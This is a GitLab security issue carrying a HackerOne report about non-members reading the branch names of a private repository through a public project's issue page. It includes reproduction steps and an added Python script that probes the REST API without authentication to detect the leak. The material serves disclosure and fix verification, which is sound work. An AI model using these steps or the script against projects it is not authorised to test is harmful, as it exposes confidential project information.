Leaking branch names of projects with confidential (private) Repository

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #3214025 by weasterhacker on 2025-06-22, assigned to @katwu:


Report

Hi team,

This issue is similar to past GitLab issues of disclosure of branch names of private (confidential) repositories.

Here is a list of past branch name disclosure issues, because it helps to triage this issue fast:

#480509 (closed) (leak branch names of confidential repository)

#508046 (closed) (Unauthorized access to reading branch names when Repository and all its assets are disabled in the project)

#406844 (closed) (Ambiguous branch name exploitation )

Now it is clear that disclosing branch names of a confidential (private) repository is a valid security issue.

Here the attacker (non-member) views branch names of the confidential repository of a public project.

Steps to reproduce

As Owner

Create a project with the repository visibility set to Only Project Members

Go to Settings > General > Visibility, project features, permissions > Repository and set it to Only Project Members.

The victim creates an issue in the victim project.

The victim navigates to the created issue; there is an option to create a merge request: first it creates a branch, then it creates a merge request.

Finish creating the merge request successfully; the merge request is created successfully.

As Attacker

Directly navigate to the victim project's branches: https://gitlab.com/groupm11/fuxxing/-/branches

Getting 404: Page not found (because the repository is set to "only project members", i.e. confidential).

Now the attacker navigates to the victim project's issue page: https://gitlab.com/groupm11/fuxxing/-/issues?show=eyJpaWQiOiI1IiwiZnVsbF9wYXRoIjoiZ3JvdXBtMTEvZnV4eGluZyIsImlkIjoxNjkyNTU3NjV9

(For PoC purposes you can also see the branch names of my project's confidential repository.)

Navigate to: https://gitlab.com/groupm11/fuxxing/-/issues?show=eyJpaWQiOiI1IiwiZnVsbF9wYXRoIjoiZ3JvdXBtMTEvZnV4eGluZyIsImlkIjoxNjkyNTU3NjV9

Or go step by step: https://gitlab.com/groupm11/fuxxing/-/issues

Now you will see the branch names of the confidential repository.

Output of checks
This bug happens on GitLab.com

Video PoC: bandicam_2025-06-22_09-56-22-533.mp4

Impact


Branch names can contain sensitive information, especially when the default branch name template for all projects is %{id}-%{title}; therefore branches that address issues contain the titles of the issues themselves, which can often be sensitive.
An example where the impact could be critical is gitlab-org/security/gitlab, as it has security-${title} as its branch name template (luckily the project is private, so it's not vulnerable).

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:
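An added check for this section, written here by the editor; it is not part of the reporter's submission and not GitLab's own code. It tests the same condition through the REST API rather than the web UI: the branch listing (`GET /api/v4/projects/:id/repository/branches`) should be denied to an anonymous caller when the Repository feature is set to Only Project Members, while the issue's related merge requests (`GET /api/v4/projects/:id/issues/:iid/related_merge_requests`) may still return `source_branch` and `target_branch`. Whether that API path leaks the way the issue page does is an assumption to verify against a test instance; the base URL, project path, issue iid and the sample responses are constructed. The HTTP layer is injectable so the verdict logic can be exercised offline against those samples.

```python
"""Check whether an anonymous caller can learn branch names of a project whose
Repository feature is restricted to project members.

Hypothetical helper written for this issue (not GitLab code, not the reporter's PoC).
Endpoints used are real GitLab v4 REST endpoints; the assumption under test is that
related_merge_requests still serves branch names when repository/branches is denied.
"""
import json
import urllib.error
import urllib.parse
import urllib.request
from typing import Any, Callable, Dict, List, Tuple

# A fetcher maps a URL to (HTTP status, parsed JSON body or None).
Fetcher = Callable[[str], Tuple[int, Any]]


def http_fetch(url: str) -> Tuple[int, Any]:
    """Unauthenticated GET against a live instance (deliberately no PRIVATE-TOKEN)."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            raw = resp.read()
            return resp.status, (json.loads(raw) if raw else None)
    except urllib.error.HTTPError as err:
        return err.code, None


def api_url(base: str, project_path: str, suffix: str) -> str:
    """Build /api/v4/projects/:id/<suffix>, URL-encoding the namespaced project path."""
    encoded = urllib.parse.quote(project_path, safe="")
    return f"{base.rstrip('/')}/api/v4/projects/{encoded}/{suffix}"


def branch_names_from_mrs(mrs: List[Dict[str, Any]]) -> List[str]:
    """Collect every branch name an MR listing reveals (source and target)."""
    names = set()
    for mr in mrs:
        for key in ("source_branch", "target_branch"):
            value = mr.get(key)
            if isinstance(value, str) and value:
                names.add(value)
    return sorted(names)


def check_branch_leak(base: str, project_path: str, issue_iid: int,
                      fetch: Fetcher = http_fetch) -> Dict[str, Any]:
    """Verdict: repository hidden from anonymous users, yet branch names still
    obtainable through the issue's related merge requests."""
    br_status, _ = fetch(api_url(base, project_path, "repository/branches"))
    repository_restricted = br_status in (401, 403, 404)

    mr_status, body = fetch(api_url(base, project_path,
                                    f"issues/{issue_iid}/related_merge_requests"))
    leaked = branch_names_from_mrs(body) if mr_status == 200 and isinstance(body, list) else []

    return {
        "branches_endpoint_status": br_status,
        "repository_restricted": repository_restricted,
        "leaked_branch_names": leaked,
        "leak": repository_restricted and bool(leaked),
    }


# Constructed sample responses (not captured from gitlab.com) modelling the reported
# state: branch listing denied, MR created from issue 5 via the UI still visible.
# The source branch follows the default %{id}-%{title} template, so it carries the title.
SAMPLE_RESPONSES = {
    "repository/branches": (403, None),
    "issues/5/related_merge_requests": (200, [
        {"iid": 1, "title": 'Draft: Resolve "Rotate leaked AWS keys"',
         "source_branch": "5-rotate-leaked-aws-keys", "target_branch": "main"},
    ]),
}


def sample_fetch(url: str) -> Tuple[int, Any]:
    """Offline stand-in for http_fetch driven by SAMPLE_RESPONSES."""
    for suffix, response in SAMPLE_RESPONSES.items():
        if url.endswith(suffix):
            return response
    return 404, None


if __name__ == "__main__":
    # Offline demonstration; pass fetch=http_fetch and a real base URL to probe an instance.
    verdict = check_branch_leak("https://gitlab.example.com", "victim-group/victim-project", 5,
                                fetch=sample_fetch)
    print(json.dumps(verdict, indent=2))
```

Run it unchanged for the offline demonstration; to test a real instance, point `base` at it, use the victim project's path and the iid of the issue the MR was created from, and keep `fetch=http_fetch` so the request goes out without any token. A `leak` of `true` means the fix must gate MR branch fields behind the same permission as the branch listing, not just hide the branches page.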